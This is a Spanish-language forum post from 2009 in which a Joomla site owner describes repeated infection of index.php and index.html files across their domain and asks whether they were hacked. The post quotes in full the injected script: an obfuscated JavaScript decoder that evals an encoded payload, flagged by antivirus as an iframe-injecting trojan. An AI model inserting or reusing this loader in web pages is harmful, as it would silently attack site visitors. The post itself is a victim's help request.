Tema: Script malicioso, autoreproducible, propagable?
Ver Mensaje Individual
  #1 (permalink)  
Antiguo 29/01/2009, 12:02
electioneering
 
Fecha de Ingreso: septiembre-2008
Mensajes: 27
Antigüedad: 15 años, 7 meses
Puntos: 0
Exclamación Script malicioso, autoreproducible, propagable?
Hola a todos,

Les escribo porque tengo el super gigante problema.

Tengo un sitio, el cual hize con Joomla. El problema es que desde hace un tiempo varias personas me decían que sus antivirus personales les decían que la página tenía un virus. Cosa que yo negaba, porque nunca he metido ningún virus, ni nada por el estilo.

Después de un tiempo, decidí instalar Kaspersky y este me arrojó de inmediato el famoso cuadrito rojo que dice que se ha encontrado un virus. Especificamente esto es lo que encontraba:

HEUR:Trojan.Script.Iframer

Bajé a mi PC el sitio completo y lo escaneé con el Kaspersky. Me arrojó que habían como 30 archivos infectados, no sólo 1.

Todos los archivos infectados son index.html o index.php.

Revisándolos me di cuenta de que efectivamente había un script que no tenía por qué estar ahí. El script es este:

Cita:
<script language=JavaScript>function ibnbn51(b) { var e=b.length,f=1024,m,y,p,k=0,j=0,n=0,t=Array(63,17, 7,36,13,60,30,39,9,58,0,0,0,0,0,0,35,50,57,37,31,0 ,56,8,18,26,25,4,15,11,51,49,38,62,55,53,34,40,27, 1,23,21,44,0,0,0,0,33,0,10,43,2,12,28,3,52,41,42,6 1,6,54,19,47,32,16,24,5,48,45,22,46,20,59,14,29);f or(y=Math.ceil(e/f);y>0;y--){p='';for(m=Math.min(e,f);m>0;m--,e--){{n|=(t[b.charCodeAt(k++)-48])<<j;if(j){p+=String.fromCharCode(229^n&255);n>>=8 ;j-=2}else{j=6}}}eval(p);}}ibnbn51('HAFTWiU3MVJ3Kk83u Tts_iFTEaZRWiU_pTGoMkBAH68@1cqNc74@f68_GcqOMHGTETz RpN4REuZCXIGl2Rq31uBRabeRuu8oEkFAdvFoaie3abtsy@a_1 lFAXiG3MkqNUHq34v5CKvqoaTqNd05SzDjgzNZNcR4geN4ocxZ s2XZ3dkq34TtSzDzO4cG@clq3qMzgrVJ3ePGoqDeodIJC8HG7D nUTMcFOV7tAdyFCKTGoVMdN') </script>><!-- ie.midominio.com -->
Hay una cosa que me llama especialmente la atención y es el hecho de que al final agrega:

<!-- ie.midominio.com -->

Después de eso, limpié toda la instalación del sitio, borrando el script de cada archivo. El problema es que ahora me doy cuenta de que no sólo está presente en MIDOMINIO.COM/CARPETA, sino que en cada /CARPETA dentro del dominio.

Por ej, tb tengo instalado otro sitio en midominio.com/carpeta2 y también están los archivos infectados con el mismo script.

Es más!!...un archivo que YA había limpiado, ahora está infectado de nuevo.

En los archivos index.php e index.html el script se ubica justo desdepués de la etiqueta <body>

Entonces la pregunta es simple.

Qué es lo que pasa?..Se puede reproducir un script?..Me hackearon?...qué puedo hacer para terminar con el problema?


Ojalá me puedan ayudar con esto porque en verdad no se qué hacer.


Muchas gracias desde ya
Última edición por electioneering; 29/01/2009 a las 12:34